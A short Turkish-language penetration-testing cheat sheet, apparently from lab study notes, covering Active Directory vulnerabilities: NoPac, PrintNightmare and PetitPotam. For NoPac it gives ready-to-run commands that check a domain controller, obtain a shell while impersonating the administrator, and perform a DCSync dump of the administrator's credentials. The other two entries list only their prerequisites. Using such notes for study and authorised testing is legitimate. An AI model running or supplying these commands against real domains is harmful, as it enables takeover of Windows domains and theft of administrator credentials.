Bleeding Edge Vulns
NoPac (CVE-2021-42278 ve CVE-2021-42287)
DC üzerinde antivirüs var ise çalışmaz
Kasım 2021 güncellemesi almayan DC üzerinde çalışır
Domain kullanıcısı gerekir
# NXC Kontrol
nxc smb 172.16.5.5 -u 'john' -p 'pass123' -M nopac
# Kontrol
python scanner.py example.local/john:pass123-dc-ip 172.16.5.5 -use-ldap
# Shell
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 -shell --impersonate administrator -use-ldap
# DCsync
python noPac.py example.local/john:pass123 -dc-ip 172.16.5.5 -dc-host ACADEMY-EA-DC01 --impersonate administrator -use-ldap -dump -just-dc-user example/administratorPrintNightmare (CVE-2021-34527 ve CVE-2021-1675)
Temmuz 2021 öncesi windows sürümlerinde görülür.
Printspooler servisi açık olmalı.
Domain kullanıcısı gerekir
PetitPotam (CVE-2021-36942)
Ağustos 2021
Domain kullanıcısı gerekmez
NTLM Reflection
Last updated